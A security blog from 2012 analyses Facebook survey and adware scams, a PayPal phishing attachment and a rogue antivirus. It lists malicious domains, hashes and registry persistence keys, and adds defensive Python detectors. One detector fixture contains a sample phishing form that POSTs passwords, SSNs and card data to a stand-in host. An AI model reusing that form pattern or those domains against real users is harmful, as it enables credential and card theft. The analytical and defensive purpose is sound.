Aug 10, 2012

"Get KFC Gift Card for FREE! (limited time only)" “Win Free Gift Cards For Mcdonald's”

"Get KFC Gift Card for FREE! (limited time only)" “Win Free Gift Cards For Mcdonald's” survey scam spreads viral across Facebook.

Free gift card scams are nothing new to Facebook and its users. Over the past few years we have seen a lot of similar scam messages. Below are some of the best-known gift card scam messages:

Walgreens is currently giving away 1 gift card to 10,000 lucky Facebook users!..
Cheesecake Factory is currently giving away $100.00 gift cards to all facebook users!!
Shell is currently giving away $100.00 gift cards to all facebook users!!
Get $1000 Kohls Gift Card for FREE! (limited time only)
Get Free SimCash in 5 minutes ! (Limited time offer)
FREE $500.00 Victoria Secret GiftCard!! (limited time only)

All of these are survey scams. To learn more about survey scams, see http://www.hoax-slayer.com/what-is-a-survey-scam.shtml

Below is a screenshot of the scam post "KFC is currently giving away $100.00 gift cards to all facebook" posted on an affected Facebook user's wall.


Clicking the link in the scam post takes you to a page like the one shown below. The page is designed to look like a Facebook page, but it does not belong to Facebook; always check the address bar. Here it is hxxp://freefboffers.net/kfcoffer.html


Following the steps given on that page invokes malicious JavaScript in the background, which posts the scam content on your Facebook wall.


Once the scam post has been shared on your Facebook wall, a window pops up and, depending on your location/country, tells you "to claim your free gift card you have to complete the survey first".


For every survey completed, the spammers earn money. You will not receive any gift card as promised. The whole thing is designed to trick you into falling for the scam and filling out surveys so that they earn money.

Similar to this one is the "Win Free Gift Cards For Mcdonald's" survey scam. A screenshot of this survey scam is shown below so that you can recognise it.


Here it is not a website but a fake event created on Facebook, mainly to make people believe the offer and fall prey to the scam. Steps 1 and 2 shown above only serve to invite your friends into the scam and keep the message spreading among Facebook users. Step 3 takes you to a BlogSpot page like the one shown below, where it prompts you to fill in surveys.


Jul 19, 2012

SCAM - Check Who Views Your Profile - Installs Adware



Below are the trending scam posts that have been spreading across Facebook over the past few weeks. Many Facebook users in Poland and the US are affected by these scam messages. Let's see how these scam posts spread on Facebook and, if you are affected, how to get rid of the wall posts.

WOW! mój profil zostal odwiedzony 58 razy W JEDEN DZIEN, widze ze mam calkiem duzo podgladaczy LOL! Poznaj swoich na -> Link to Adware (English: "WOW! My profile was visited 58 times IN ONE DAY, I see I have quite a lot of snoopers LOL! Find out who yours are at -> Link to Adware")



Clicking the link leads to a page like the one shown below, which checks whether you are using the Firefox browser.


If so, it installs iFamebook, an ad-supported Firefox browser plugin, which displays unwanted ads while you use Facebook.



Obviously the spammers earn a commission for delivering this plugin and its ads. Remember there is no app, plugin or other way to track who views your Facebook profile, so don't fall for these scams. To report a scam post, right-click the 'X' mark in the top right corner of the post and select Report/Mark as spam.


To remove the add-on, go to Tools -> Add-ons in your Firefox browser and click Remove, as shown below.


WOW!!! Hello PlNK facebook !!! and goodbye blue facebook! You can now switch your facebook color and themes to 8 different colors thanks to the fb developer team! Get yours here --> Link to Fake apps


This is an old scam with a new link and post text. When you click the link it redirects you to a fake Facebook app page like the one shown below.


Clicking Continue tries to add the fake app to your Facebook account. Here the fake app is named 'chgng my Thmes V7'.


But there are many more out there with random junk names:

hxxp://apps.facebook.com/cleanestcolors/
hxxp://apps.facebook.com/ytrdgfxsdg/
hxxp://apps.facebook.com/pjknhyui/
hxxp://apps.facebook.com/donethjw/
hxxp://apps.facebook.com/uhjgtygf/

To get rid of these fake apps, go to Home -> Account Settings -> Apps -> Remove in your Facebook account.



May 12, 2012

OMG I Just Hate Miley Cyrus After Watching This Video - Survey Scam

An old variant of the Facebook survey scam is spreading virally with the new post title "Miley cyrus seex tape leadked today on facebook" and an offensive thumbnail. Below is a sample wall post of the scam, but there are many out there with different blogspot links, so be careful before clicking any blogspot link on Facebook.



Following the link in the wall post leads to a page like the one below, which tells you that you don't have the plugin required to watch the video and asks you to install a plugin named "Youtube Premium". We have seen many survey scams like this and have already warned users never to agree to install a plugin unless they have good reason to trust the source. Here it is a malicious plugin that attaches to your browser, spreads the scam message using your Facebook account and also brings up survey scams to fill in.



Below is the survey scam the plugin brought up on my test machine: a typical Facebook survey scam that, under the guise of age verification, asks users to fill in a survey so that the spammers earn money. Since it is a scam you will never see the video, no matter how many surveys you complete.


Removal Instructions:


To get rid of this scam and the wall posts, go to Settings -> Extensions -> Remove in your Google Chrome browser.


Firefox users: go to Tools -> Add-ons -> Remove.


Technical Specifications:


Once the install-plugin button is clicked, the page contacts plugincodescript.blogspot.it, checks whether the user's browser is Chrome, Firefox or something else, and pushes the matching plugin.


After the malicious plugin is installed it runs the script viralscripts.it/divx2/script.js whenever the user opens the browser. script.js in turn calls viralscripts.it/divx2/extra.js.


The script extra.js contacts viralscripts.it/divx2/watch.php to identify the user's location and viralscripts.it/divx2/function.js to steal user cookies and generate random user comments and blogspot links.


Below you can see the script that generates random blogspot links and appends them to the scam message depending on the user's location.


Here you can see it generate random user comments and post them on the infected user's wall.
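Because Blogger serves the same blog under a different country domain (blogspot.com, .it, .co.uk, .com.ar, ...) depending on where the visitor is, a blocklist keyed on the full hostname misses most of the location-specific links this script generates. The following added example (not code from the original post) normalises blogspot URLs found in wall posts back to the blog name before matching; the sample posts and the name `fakescamblog` are constructed, while `plugincodescript` is the host named above.

```python
import re
from urllib.parse import urlparse

# Constructed sample wall posts; "hxxp" is the defanged form used in the post.
SAMPLE_POSTS = [
    "OMG I just hate Miley Cyrus after watching this hxxp://plugincodescript.blogspot.it",
    "check this http://fakescamblog.blogspot.com.ar/?v=1 LOL",
    "my recipe blog http://bakingwithsam.blogspot.co.uk/2012/05/",
    "https://www.youtube.com/watch?v=placeholder",
]
# Blog names to block: plugincodescript is from the post, fakescamblog is a placeholder.
KNOWN_SCAM_BLOGS = {"plugincodescript", "fakescamblog"}

# name.blogspot.com / .it / .co.uk / .com.es ... -> capture only "name".
BLOGSPOT_HOST = re.compile(r"^([a-z0-9-]+)\.blogspot\.(?:com?\.)?[a-z]{2,3}$", re.I)
URL_RE = re.compile(r"(?:hxxps?|https?)://[^\s\"'<>]+", re.I)

def blog_name(url):
    """Return the Blogger blog name for a blogspot URL under any country TLD, else None."""
    host = urlparse(url if "://" in url else "http://" + url).hostname or ""
    m = BLOGSPOT_HOST.match(host)
    return m.group(1).lower() if m else None

def flag_posts(posts, blocklist=KNOWN_SCAM_BLOGS):
    """Return (blog_name, url) for every link in the posts that hits the blocklist."""
    hits = []
    for post in posts:
        for url in URL_RE.findall(post):
            name = blog_name(url.replace("hxxp", "http", 1))  # re-arm defanged links
            if name in blocklist:
                hits.append((name, url))
    return hits
```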


Below is the list of domains that participated in spreading this scam:


Apr 17, 2012

RockMelt is a virus - Hoax

The latest hoax message spreading among Facebook users is shown below. The content of the message is false: RockMelt does not contain anything malicious, as the post claims. The sad thing is that many people blindly spread the hoax without knowing anything about RockMelt.



So, what is RockMelt? It is nothing but a social web browser like any other browser out there, with some additional functions such as adding social networking apps and receiving instant updates. After installing the RockMelt browser you are prompted with the window shown below. If you want, you can use your Facebook account with this browser to get quick updates; otherwise click Cancel and use it as a normal web browser.


Here I have logged in with a Facebook account to show you how it works. It is added like any other Facebook app so that it can fetch updates from the user's wall and display them as notifications.



You can also restrict the permissions granted to this application at install time, so it does nothing without the user's knowledge, which shows it is legitimate. At the bottom of the image below you can also see that it clearly states why it needs these permissions from a Facebook user.


Below you can see how the browser looks once installed. In the left corner is the list of apps added to the browser, which gives you instant updates.


When you chat on Facebook through the RockMelt social web browser there is an option to send your friends an invite to install RockMelt. This is what many chat users misunderstand, because a lot of malware spreads through Facebook chat by providing a link to download an executable file; in this case, however, the link is legitimate.


When the user clicks "Send RockMelt Invite", an invite is sent to the user's friend through chat, as shown below. The link takes them to the RockMelt website, a well-known legitimate site, so there is nothing to worry about. Install it if you want; otherwise ignore it.


You can add many apps to your social web browser to keep them automatically updated. To learn more about the RockMelt browser, see http://www.rockmelt.com/about.html


The RockMelt browser is also available in the App Store for iPhone users: http://itunes.apple.com/us/app/rockmelt/id416256246?mt=8

Apr 16, 2012

Survey Scam - "2012 DOOMSDAY CONFIRMED: NASA WARNS BE PREPARED!!(LEAKED VIDEO)"

A new survey scam is spreading virally across Facebook, claiming that a leaked NASA video confirms the 2012 doomsday, so be prepared. Below is a sample post of the survey scam.



Clicking the link in the wall post takes you to the blogspot page shown below. This page has been designed to trick users and spread the scam. Everything you see here is fake; it does not contain any video as you would expect. How can I say this? Scroll down to see what it actually contains.


When you click the play icon you are asked to share the video before it will play. How can it ask someone to share before they know what it contains? It does so because every time someone clicks the share button the scam gets posted on their wall and their friends see it in their news feed. Until you click Share it won't show anything.


You may ask how it knows whether you have clicked the share button. The answer is simple: it uses a JavaScript function to identify whether the user has clicked it. Below are some of the JS functions used in this malicious page.


Once you have shared the page, the share button changes to play. When you click play it pops up a web page, "http://watchmere.blogspot.com/", containing the survey to be filled in. The surveys change depending on your location.


As I said earlier, there is no NASA video or any other video here; it only leads to surveys to fill in. We already know these surveys benefit the scammer for every one completed. Beware of these survey scams and stay away from fraudulent links. If you find something suspicious, Google it before clicking on it. Last but not least, please report such links to Facebook when you come across them.

Mar 20, 2012

Your Account has been Limited! Identity Issue PP-658-119-347 - Phishing mail


A phishing email targeting PayPal customers in order to steal their account information.

Below is the mail I received today, which claims to be from PayPal. It says my PayPal account has been limited and asks me to fill in the attached form to restore access.


The attached form "PP-658-119-347.htm" is an HTML file containing obfuscated JavaScript.


Deobfuscating it reveals the original script used to collect the user's personal information.



On opening the mail attachment it displays a page similar to the PayPal profile update page. It is an HTML file well designed to look like PayPal. How do we know that? You have not logged into any account with your credentials, yet you can see a Logout button below as if you had logged in. Also, remember you have opened an HTML file, not the original website; check your address bar.


It collects basic profile information along with your PayPal password. On the next page it checks which country you are from. If you are from the US you are prompted with an additional box asking for your "Social Security Number"; if Sweden, it prompts for a "Personal identity number". Likewise it adapts what it displays based on the country.


Finally it asks you to enter credit/debit card information. It even validates the input fields: if you try to skip a field or enter invalid data, it pops up an alert message.


So, where does it send this information? The answer can be found below. It POSTs the collected information to a remote site, which may itself be a compromised site. Once the account information has been collected, the attacker will use it.
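The indicators described above (a form in a local HTML file that asks for a password, national ID and card data, POSTs it to a remote host, carries obfuscated JavaScript and shows a Logout button although nobody logged in) can be checked mechanically before anyone opens such an attachment. The following added example (not code from the original post) does that triage; the embedded attachment and the host `compromised-site.invalid` are constructed stand-ins, not the real PP-658-119-347.htm.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed stand-in for the attachment: mimics PayPal, collects secrets, POSTs off-site.
SAMPLE_HTM = """
<html><body>
<script>eval(unescape('%64%6f%63%75%6d%65%6e%74'));</script>
<form method="post" action="http://compromised-site.invalid/pp/update.php">
  <input name="email"> <input type="password" name="password">
  <input name="ssn"> <input name="cardnumber"> <input name="cvv">
</form>
<a href="#">Log Out</a>
</body></html>
"""

SENSITIVE = {"password", "ssn", "cardnumber", "cvv", "pin", "personnummer"}
OBFUSCATION = re.compile(r"\b(eval|unescape|String\.fromCharCode|document\.write)\s*\(")

class FormCollector(HTMLParser):
    """Collects every <form action> target and <input name> in the document."""
    def __init__(self):
        super().__init__()
        self.actions, self.inputs = [], []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form" and a.get("action"):
            self.actions.append(a["action"])
        elif tag == "input" and a.get("name"):
            self.inputs.append(a["name"].lower())

def under_domain(host, domain):
    return host == domain or host.endswith("." + domain)

def triage(html, expected_domain="paypal.com"):
    """Indicators found in an attachment; 'phishing' when secrets are posted off-domain.
    Relative actions count as foreign too: an e-mailed file has no legitimate origin.
    fake_logout flags the Log Out button shown although the victim never logged in."""
    p = FormCollector()
    p.feed(html)
    foreign = [u for u in p.actions
               if not under_domain(urlparse(u).hostname or "", expected_domain)]
    r = {
        "foreign_targets": foreign,
        "asks_sensitive": sorted(set(p.inputs) & SENSITIVE),
        "obfuscated_js": bool(OBFUSCATION.search(html)),
        "fake_logout": bool(re.search(r"log\s*out", html, re.I)),
    }
    r["verdict"] = "phishing" if foreign and r["asks_sensitive"] else "review"
    return r
```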


Beware of these phishing email scams and avoid entering your personal information when prompted through email. Always go to the trusted secure site to update your personal and financial information.

Mar 9, 2012

Windows Personal Doctor – Fake AV, a new variant of Windows Personal Detective / Windows Basic Antivirus


Windows Personal Doctor is the latest rogue security product spreading across the internet. Once a system is infected, this fake AV terminates running instances of several security-related processes and displays annoying fake alerts saying the system is infected. These fake AVs are usually distributed through malicious domains; here the domain is security-safe-2012-ddgfdgff.info/cba49fa4efefc673/setup.exe. This 'setup.exe' is an archive containing the file '4fpx4r7s6b2f184.exe', which you can extract with 7-Zip. '4fpx4r7s6b2f184.exe' is in turn a password-protected archive containing the actual malware, "Filesystemscan.exe". The malware uses these multiple layers of packaging to evade signature detection.

Filename: Setup.exe
MD5: AC0B10D6D112357731760EDAED700AEF
SHA-1: 17A1C899A0973BDDFEC0AA7A872720C75191390E

Filename: Filesystemscan.exe
MD5: 35A925E1586B5413932651E82F559EDF
SHA-1: B89A960E739DAC209F6E2F91EC8D5A1367BDAE6C


Upon execution, "Filesystemscan.exe" makes the following system changes:

C:\Documents and Settings\Administrator\Application Data\Protector-yiw.exe
C:\Documents and Settings\Administrator\Application Data\result.db
C:\Documents and Settings\Administrator\Desktop\Windows Personal Doctor.lnk
C:\Documents and Settings\All Users\Start Menu\Programs\Windows Personal Doctor.lnk

HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System   DisableRegedit
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System   DisableRegistryTools
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System   DisableTaskMgr
HKCU\Software\Microsoft\Windows\CurrentVersion\Run   Inspector   \Application Data\Protector-yiw.exe

It disables the Windows Defender service (WinDefend) and the Microsoft Protection service (msmpsvc), and prevents the user from running several security tools on the infected PC.
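The policy values and the Run entry listed above are exactly what an incident responder would look for in a registry export from a suspect machine. The following added example (not code from the original post) parses a `.reg` export, reports the lockout policies and the Protector-*.exe autorun, and emits the `reg delete` commands that undo them; the export text is constructed to match the keys listed above.

```python
import re

# Constructed .reg export reflecting the changes listed above; on a real host
# this text would come from: reg export HKCU\Software\Microsoft\Windows\CurrentVersion out.reg
SAMPLE_REG = r"""
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegedit"=dword:00000001
"DisableRegistryTools"=dword:00000001
"DisableTaskMgr"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"Inspector"="C:\\Documents and Settings\\Administrator\\Application Data\\Protector-yiw.exe"
"ctfmon.exe"="C:\\WINDOWS\\system32\\ctfmon.exe"
"""

POLICY_KEY = r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System"
RUN_KEY = r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run"
LOCKOUT_VALUES = {"DisableRegedit", "DisableRegistryTools", "DisableTaskMgr"}
# The rogue drops Protector-<random>.exe into the user's Application Data folder.
ROGUE_RUN = re.compile(r"Application Data\\+Protector-\w+\.exe$", re.I)

def parse_reg(text):
    """Return {key: {value_name: raw_data}} from a .reg export."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
        elif current and line.startswith('"'):
            name, _, data = line[1:].partition('"=')
            keys[current][name] = data
    return keys

def find_indicators(text):
    """Return (kind, key, value_name) tuples for every indicator present."""
    keys, hits = parse_reg(text), []
    for name, data in keys.get(POLICY_KEY, {}).items():
        if name in LOCKOUT_VALUES and data.lower() == "dword:00000001":
            hits.append(("lockout_policy", POLICY_KEY, name))
    for name, data in keys.get(RUN_KEY, {}).items():
        if ROGUE_RUN.search(data.strip('"')):
            hits.append(("rogue_autorun", RUN_KEY, name))
    return hits

def remediation_commands(hits):
    """reg.exe commands that undo each finding (run after the rogue process is stopped)."""
    short = lambda k: k.replace("HKEY_CURRENT_USER", "HKCU")
    return [f'reg delete "{short(key)}" /v "{name}" /f' for _, key, name in hits]
```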


It performs a fake scan of the system and reports that infections have been identified, but it is all fake: the results are designed to make people fall prey to it. To make the user believe it, the program imitates some legitimate system functions such as a Service Manager, Autorun (Startup) Manager, Process controller, etc.


The results shown above are predefined; they are read from the file result.db and displayed. We already know result.db is dropped by this Trojan, so it is all fake, meant to trick you into buying the rogue product. Below is a hex view of result.db showing the data used for the fake results.


When you try to get rid of the infection by clicking Remove All, or click anywhere else in the rogue program, you are only prompted with a window to activate the product.


Never enter your personal details when prompted by these rogue products; you will lose your money. Below is the fake payment window used by the Trojan to collect the user's credit card and personal information.


Sites contacted by this Trojan:
http://galaint.online-secure-pay.info
http://online-secure-pay4.info/service/